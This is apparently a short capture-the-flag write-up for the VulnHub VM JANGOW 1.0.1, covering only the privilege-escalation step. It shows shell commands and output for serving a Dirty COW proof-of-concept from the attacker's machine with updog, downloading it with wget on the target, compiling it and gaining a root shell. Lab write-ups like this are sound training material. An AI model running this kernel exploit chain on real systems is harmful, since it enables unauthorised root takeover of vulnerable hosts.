This is JANGOW: 1.0.1 from VulnHub.

Difficulty: Easy

The secret to this box is enumeration!

Did I ever mention I hate old kernel exploits? Yeah well this one works:

└─# updog -p 443          
[+] Serving /opt/scripts...
 * Running on all addresses.
   WARNING: This is a development server. Do not use it in a production deployment.
 * Running on (Press CTRL+C to quit) - - [17/Nov/2021 05:15:19] "GET /dirtypoc.c HTTP/1.1" 200 -
jangow01@jangow01:~$ wget
--2021-11-17 19:15:18--
Conectando-se a conectado.
A requisição HTTP foi enviada, aguardando resposta... 200 OK
Tamanho: 5120 (5,0K) [text/x-csrc]
Salvando em: “dirtypoc.c”

dirtypoc.c          100%[===================>]   5,00K  --.-KB/s    in 0s      

2021-11-17 19:15:18 (110 MB/s) - “dirtypoc.c” salvo [5120/5120]

jangow01@jangow01:~$ mv dirtypoc.c dirtycow-mem.c
mv dirtypoc.c dirtycow-mem.c
jangow01@jangow01:~$ gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
# this throws an error; ignore it
jangow01@jangow01:~$ ./dirtycow-mem
[*] range: 7f078928f000-7f078944f000]
[*] getuid = 7f078935c2c0
[*] mmap 0x7f0789acb000
[*] exploiting (patch)
[*] patched (procselfmemThread)
[*] patched (madviseThread)
root@jangow01:/home/jangow01# [*] exploiting (unpatch)
[*] unpatched: uid=1000 (procselfmemThread)
[*] unpatched: uid=1000 (madviseThread)
uid=0(root) gid=0(root) grupos=0(root)
Qua Nov 17 19:16:22 BRST 2021

How did we get here? Who cares, it’s not interesting.